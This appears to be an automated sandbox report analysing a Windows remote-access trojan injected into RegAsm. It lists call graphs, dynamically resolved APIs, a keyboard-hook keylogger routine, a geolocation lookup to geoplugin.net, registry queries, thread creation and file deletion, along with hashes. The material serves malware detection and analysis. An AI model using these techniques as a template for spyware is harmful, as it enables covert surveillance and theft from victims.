49211->49223 49213 426b44 49212->49213 49214 426abd 49212->49214 49215 426b1d 49212->49215 49218 426af2 49212->49218 49219 426a48 49212->49219 49212->49223 49225 426a7d 49212->49225 49239 424edd 49 API calls ctype 49212->49239 49213->49223 49244 426155 28 API calls 49213->49244 49214->49218 49214->49223 49242 41fb6c 52 API calls 49214->49242 49215->49213 49215->49223 49227 425ae1 49215->49227 49218->49215 49243 4256f0 21 API calls 49218->49243 49219->49223 49219->49225 49240 41fb6c 52 API calls 49219->49240 49225->49214 49225->49223 49241 424edd 49 API calls ctype 49225->49241 49228 425b00 ___scrt_fastfail 49227->49228 49230 425b0f 49228->49230 49233 425b34 49228->49233 49245 41ebbb 21 API calls 49228->49245 49230->49233 49238 425b14 49230->49238 49246 4205d8 46 API calls 49230->49246 49233->49213 49234 425b1d 49234->49233 49249 424d05 21 API calls 2 library calls 49234->49249 49236 425bb7 49236->49233 49247 432ec4 21 API calls _Yarn 49236->49247 49238->49233 49238->49234 49248 41da5f 49 API calls 49238->49248 49239->49219 49240->49219 49241->49214 49242->49214 49243->49215 49244->49223 49245->49230 49246->49236 49247->49238 49248->49234 49249->49233 49250 434875 49255 434b47 SetUnhandledExceptionFilter 49250->49255 49252 43487a pre_c_initialization 49256 44554b 20 API calls 2 library calls 49252->49256 49254 434885 49255->49252 49256->49254 49257 415d06 49272 41b380 49257->49272 49259 415d0f 49260 4020f6 28 API calls 49259->49260 49261 415d1e 49260->49261 49283 404aa1 61 API calls ctype 49261->49283 49263 415d2a 49264 417089 49263->49264 49265 401fd8 11 API calls 49263->49265 49266 401e8d 11 API calls 49264->49266 49265->49264 49267 417092 49266->49267 49268 401fd8 11 API calls 49267->49268 49269 41709e 49268->49269 49270 401fd8 11 API calls 49269->49270 49271 4170aa 49270->49271 49273 4020df 11 API calls 49272->49273 49274 41b38e 49273->49274 49275 43bd51 _Yarn 21 API calls 49274->49275 49276 41b39e InternetOpenW InternetOpenUrlW 49275->49276 49277 41b3c5 InternetReadFile 49276->49277 49281 41b3e8 49277->49281 49278 4020b7 28 API calls 49278->49281 49279 41b415 InternetCloseHandle InternetCloseHandle 49280 41b427 49279->49280 49280->49259 49281->49277 49281->49278 49281->49279 49282 401fd8 11 API calls 49281->49282 49282->49281 49283->49263 49284 426c4b 49289 426cc8 send 49284->49289 49290 44831e 49298 448710 49290->49298 49293 448332 49295 44833a 49296 448347 49295->49296 49306 44834a 11 API calls 49295->49306 49299 4484ca __Toupper 5 API calls 49298->49299 49300 448737 49299->49300 49301 44874f TlsAlloc 49300->49301 49302 448740 49300->49302 49301->49302 49303 434fcb CatchGuardHandler 5 API calls 49302->49303 49304 448328 49303->49304 49304->49293 49305 448299 20 API calls 3 library calls 49304->49305 49305->49295 49306->49293 49307 43be58 49309 43be64 _swprintf ___DestructExceptionObject 49307->49309 49308 43be72 49323 4405dd 20 API calls __dosmaperr 49308->49323 49309->49308 49311 43be9c 49309->49311 49318 445888 EnterCriticalSection 49311->49318 49313 43be77 ___DestructExceptionObject __wsopen_s 49314 43bea7 49319 43bf48 49314->49319 49318->49314 49320 43bf56 49319->49320 49322 43beb2 49320->49322 49325 44976c 37 API calls 2 library calls 49320->49325 49324 43becf LeaveCriticalSection std::_Lockit::~_Lockit 49322->49324 49323->49313 49324->49313 49325->49320 49326 41dfbd 49327 41dfd2 ctype ___scrt_fastfail 49326->49327 49339 41e1d5 49327->49339 49345 432ec4 21 API calls _Yarn 49327->49345 49330 41e1e6 49332 41e189 49330->49332 49341 432ec4 21 API calls _Yarn 49330->49341 49331 41e182 ___scrt_fastfail 49331->49332 49346 432ec4 21 API calls _Yarn 49331->49346 49335 41e21f ___scrt_fastfail 49335->49332 49342 43354a 49335->49342 49337 41e1af ___scrt_fastfail 49337->49332 49347 432ec4 21 API calls _Yarn 49337->49347 49339->49332 49340 41db62 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 49339->49340 49340->49330 49341->49335 49348 433469 49342->49348 49344 433552 49344->49332 49345->49331 49346->49337 49347->49339 49349 433482 49348->49349 49350 433478 49348->49350 49349->49350 49354 432ec4 21 API calls _Yarn 49349->49354 49350->49344 49352 4334a3 49352->49350 49355 433837 CryptAcquireContextA 49352->49355 49354->49352 49356 433858 CryptGenRandom 49355->49356 49357 433853 49355->49357 49356->49357 49358 43386d CryptReleaseContext 49356->49358 49357->49350 49358->49357 49359 40165e 49360 401666 49359->49360 49362 401669 49359->49362 49361 4016a8 49363 4344ea new 22 API calls 49361->49363 49362->49361 49364 401696 49362->49364 49365 40169c 49363->49365 49366 4344ea new 22 API calls 49364->49366 49366->49365 49367 426bdc 49373 426cb1 recv 49367->49373

              Executed Functions

              Function 0041CB50 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
              Download Yara Rule

              Control-flow Graph

              APIs
              • LoadLibraryA.KERNEL32(Psapi), ref: 0041CB65
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB6E
              • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB88
              • LoadLibraryA.KERNEL32(shcore), ref: 0041CB9A
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB9D
              • LoadLibraryA.KERNEL32(user32), ref: 0041CBAE
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBB1
              • LoadLibraryA.KERNEL32(ntdll), ref: 0041CBC3
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBC6
              • LoadLibraryA.KERNEL32(kernel32), ref: 0041CBD2
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBD5
              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBE9
              • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBFD
              • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC0E
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC11
              • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC25
              • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC39
              • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC4D
              • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC61
              • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC75
              • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CC83
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC86
              • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC97
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC9A
              • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCAA
              • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCBA
              • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CCCC
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCCF
              • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CCDC
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCDF
              • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCF3
              • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD07
              • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD19
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD1C
              • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD29
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD2C
              • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD39
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD3C
              • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD49
              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD4C
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: AddressProc$LibraryLoad$HandleModule
              • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
              • API String ID: 4236061018-3687161714
              • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
              • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
              • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
              • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE
              Function 0040A2B8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1286 40a2b8-40a2cf 1287 40a2d1-40a2eb GetModuleHandleA SetWindowsHookExA 1286->1287 1288 40a333-40a343 GetMessageA 1286->1288 1287->1288 1291 40a2ed-40a331 GetLastError call 41bb8e call 4052fd call 402093 call 41b4ef call 401fd8 1287->1291 1289 40a345-40a35d TranslateMessage DispatchMessageA 1288->1289 1290 40a35f 1288->1290 1289->1288 1289->1290 1292 40a361-40a366 1290->1292 1291->1292
              APIs
              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
              • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
              • GetLastError.KERNEL32 ref: 0040A2ED
                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
              • GetMessageA.USER32 ref: 0040A33B
              • TranslateMessage.USER32(?), ref: 0040A34A
              • DispatchMessageA.USER32 ref: 0040A355
              Strings
              • Keylogger initialization failure: error , xrefs: 0040A301
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
              • String ID: Keylogger initialization failure: error
              • API String ID: 3219506041-952744263
              • Opcode ID: 24ad775559425fbf79376f518a65b03612fe455b391ecaf03d99fa65814271bc
              • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
              • Opcode Fuzzy Hash: 24ad775559425fbf79376f518a65b03612fe455b391ecaf03d99fa65814271bc
              • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
              Function 0040A3E0 Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
              Download Yara Rule

              Control-flow Graph

              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
              • String ID:
              • API String ID: 1888522110-0
              • Opcode ID: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
              • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
              • Opcode Fuzzy Hash: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
              • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
              Function 0041B380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1385 41b380-41b3c3 call 4020df call 43bd51 InternetOpenW InternetOpenUrlW 1390 41b3c5-41b3e6 InternetReadFile 1385->1390 1391 41b3e8-41b408 call 4020b7 call 403376 call 401fd8 1390->1391 1392 41b40c-41b40f 1390->1392 1391->1392 1394 41b411-41b413 1392->1394 1395 41b415-41b422 InternetCloseHandle * 2 call 43bd4c 1392->1395 1394->1390 1394->1395 1399 41b427-41b431 1395->1399
              APIs
              • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
              • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
              • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
              • InternetCloseHandle.WININET(00000000), ref: 0041B41C
              • InternetCloseHandle.WININET(00000000), ref: 0041B41F
              Strings
              • http://geoplugin.net/json.gp, xrefs: 0041B3B7
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Internet$CloseHandleOpen$FileRead
              • String ID: http://geoplugin.net/json.gp
              • API String ID: 3121278467-91888290
              • Opcode ID: a69ade3d4837a55be9fd6a93abde095b6ea90823e789e142765cb78eb82537c4
              • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
              • Opcode Fuzzy Hash: a69ade3d4837a55be9fd6a93abde095b6ea90823e789e142765cb78eb82537c4
              • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
              Function 0040F7A7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
              Download Yara Rule

              Control-flow Graph

              APIs
                • Part of subcall function 00413549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                • Part of subcall function 00413549: RegQueryValueExA.KERNEL32 ref: 00413587
                • Part of subcall function 00413549: RegCloseKey.KERNEL32(?), ref: 00413592
              • Sleep.KERNEL32(00000BB8), ref: 0040F85B
              • ExitProcess.KERNEL32 ref: 0040F8CA
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CloseExitOpenProcessQuerySleepValue
              • String ID: 4.9.4 Pro$override$pth_unenc
              • API String ID: 2281282204-930821335
              • Opcode ID: b93807ab3ce0d5bba4bd1ccb9a8b41d40f094000d2685bb717fd1cbe92334c8f
              • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
              • Opcode Fuzzy Hash: b93807ab3ce0d5bba4bd1ccb9a8b41d40f094000d2685bb717fd1cbe92334c8f
              • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
              Function 00433837 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
              Download Yara Rule
              APIs
              • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,004334BF,00000034,?,?,008C9ED0), ref: 00433849
              • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000), ref: 0043385F
              • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000,0041E251), ref: 00433871
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Crypt$Context$AcquireRandomRelease
              • String ID:
              • API String ID: 1815803762-0
              • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
              • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
              • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
              • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
              Function 00448957 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30timeCOMMON
              Download Yara Rule
              APIs
              • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996
              Strings
              • GetSystemTimePreciseAsFileTime, xrefs: 00448972
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Time$FileSystem
              • String ID: GetSystemTimePreciseAsFileTime
              • API String ID: 2086374402-595813830
              • Opcode ID: ec0f4eb119bfc3d52cbbcb4ffab675a518ff64a6f359a61470016f4626938150
              • Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
              • Opcode Fuzzy Hash: ec0f4eb119bfc3d52cbbcb4ffab675a518ff64a6f359a61470016f4626938150
              • Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE
              Function 0041B60D Relevance: 1.5, APIs: 1, Instructions: 41COMMON
              Download Yara Rule
              APIs
              • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: NameUser
              • String ID:
              • API String ID: 2645101109-0
              • Opcode ID: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
              • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
              • Opcode Fuzzy Hash: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
              • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
              Function 00434B47 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
              Download Yara Rule
              APIs
              • SetUnhandledExceptionFilter.KERNEL32 ref: 00434B4C
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ExceptionFilterUnhandled
              • String ID:
              • API String ID: 3192549508-0
              • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
              • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
              • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
              • Instruction Fuzzy Hash:
              Function 0040E9C5 Relevance: 86.5, APIs: 15, Strings: 34, Instructions: 795COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 5 40e9c5-40ea47 call 41cb50 GetModuleFileNameW call 40f3c3 call 4020f6 * 2 call 41be1b call 40fb17 call 401e8d call 43fd00 22 40ea93-40eb5b call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->22 23 40ea49-40ea8e call 40fbb3 call 401e65 call 401fab call 410f37 call 40fb64 call 40f3b0 5->23 69 40eb5d-40eba8 call 406c1e call 401fe2 call 401fd8 call 401fab call 413549 22->69 70 40ebae-40ebc9 call 401e65 call 40b9bd 22->70 49 40eef2-40ef03 call 401fd8 23->49 69->70 102 40f34f-40f36a call 401fab call 4139a9 call 412475 69->102 79 40ec03-40ec0a call 40d069 70->79 80 40ebcb-40ebea call 401fab call 413549 70->80 88 40ec13-40ec1a 79->88 89 40ec0c-40ec0e 79->89 80->79 98 40ebec-40ec02 call 401fab call 4139a9 80->98 93 40ec1c 88->93 94 40ec1e-40ec2a call 41b2c3 88->94 92 40eef1 89->92 92->49 93->94 104 40ec33-40ec37 94->104 105 40ec2c-40ec2e 94->105 98->79 126 40f36f-40f3a0 call 41bc5e call 401f04 call 413a23 call 401f09 * 2 102->126 108 40ec76-40ec89 call 401e65 call 401fab 104->108 109 40ec39 call 407716 104->109 105->104 127 40ec90-40ed18 call 401e65 call 41bc5e call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->127 128 40ec8b call 407755 108->128 118 40ec3e-40ec40 109->118 121 40ec42-40ec47 call 407738 call 407260 118->121 122 40ec4c-40ec5f call 401e65 call 401fab 118->122 121->122 122->108 141 40ec61-40ec67 122->141 157 40f3a5-40f3af call 40dd42 call 414f2a 126->157 177 40ed80-40ed84 127->177 178 40ed1a-40ed33 call 401e65 call 401fab call 43bad6 127->178 128->127 141->108 144 40ec69-40ec6f 141->144 144->108 147 40ec71 call 407260 144->147 147->108 179 40ef06-40ef66 call 436e90 call 40247c call 401fab * 2 call 4136f8 call 409057 177->179 180 40ed8a-40ed91 177->180 178->177 203 40ed35-40ed7b call 401e65 call 401fab call 401e65 call 401fab call 40da34 call 401f13 call 401f09 178->203 234 40ef6b-40efbf call 401e65 call 401fab call 402093 call 401fab call 41376f call 401e65 call 401fab call 43baac 179->234 182 40ed93-40ee0d call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40cdf9 180->182 183 40ee0f-40ee19 call 409057 180->183 193 40ee1e-40ee42 call 40247c call 434798 182->193 183->193 210 40ee51 193->210 211 40ee44-40ee4f call 436e90 193->211 203->177 217 40ee53-40ee9e call 401f04 call 43f809 call 40247c call 401fab call 40247c call 401fab call 413947 210->217 211->217 271 40eea3-40eec8 call 4347a1 call 401e65 call 40b9bd 217->271 286 40efc1 234->286 287 40efdc-40efde 234->287 271->234 288 40eece-40eeed call 401e65 call 41bc5e call 40f474 271->288 289 40efc3-40efda call 41cd9b CreateThread 286->289 290 40efe0-40efe2 287->290 291 40efe4 287->291 288->234 306 40eeef 288->306 294 40efea-40f0c6 call 402093 * 2 call 41b4ef call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43baac call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409de4 call 401e65 call 401fab 289->294 290->289 291->294 344 40f101 294->344 345 40f0c8-40f0ff call 4344ea call 401e65 call 401fab CreateThread 294->345 306->92 347 40f103-40f11b call 401e65 call 401fab 344->347 345->347 356 40f159-40f16c call 401e65 call 401fab 347->356 357 40f11d-40f154 call 4344ea call 401e65 call 401fab CreateThread 347->357 367 40f1cc-40f1df call 401e65 call 401fab 356->367 368 40f16e-40f1c7 call 401e65 call 401fab call 401e65 call 401fab call 40d9e8 call 401f13 call 401f09 CreateThread 356->368 357->356 379 40f1e1-40f215 call 401e65 call 401fab call 401e65 call 401fab call 43baac call 40c162 367->379 380 40f21a-40f23e call 41b60d call 401f13 call 401f09 367->380 368->367 379->380 400 40f240-40f241 SetProcessDEPPolicy 380->400 401 40f243-40f256 CreateThread 380->401 400->401 404 40f264-40f26b 401->404 405 40f258-40f262 CreateThread 401->405 408 40f279-40f280 404->408 409 40f26d-40f277 CreateThread 404->409 405->404 412 40f282-40f285 408->412 413 40f28e 408->413 409->408 416 40f287-40f28c 412->416 417 40f2cc-40f2df call 401fab call 4134ff 412->417 415 40f293-40f2c7 call 402093 call 4052fd call 402093 call 41b4ef call 401fd8 413->415 415->417 416->415 426 40f2e4-40f2e7 417->426 426->157 428 40f2ed-40f32d call 41bc5e call 401f04 call 41361b call 401f09 call 401f04 426->428 443 40f346-40f34b DeleteFileW 428->443 444 40f34d 443->444 445 40f32f-40f332 443->445 444->126 445->126 446 40f334-40f341 Sleep call 401f04 445->446 446->443
              APIs
                • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Psapi), ref: 0041CB65
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB6E
                • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB88
                • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore), ref: 0041CB9A
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB9D
                • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32), ref: 0041CBAE
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBB1
                • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll), ref: 0041CBC3
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBC6
                • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32), ref: 0041CBD2
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBD5
                • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBE9
                • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBFD
                • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC0E
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC11
                • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC25
                • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC39
                • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
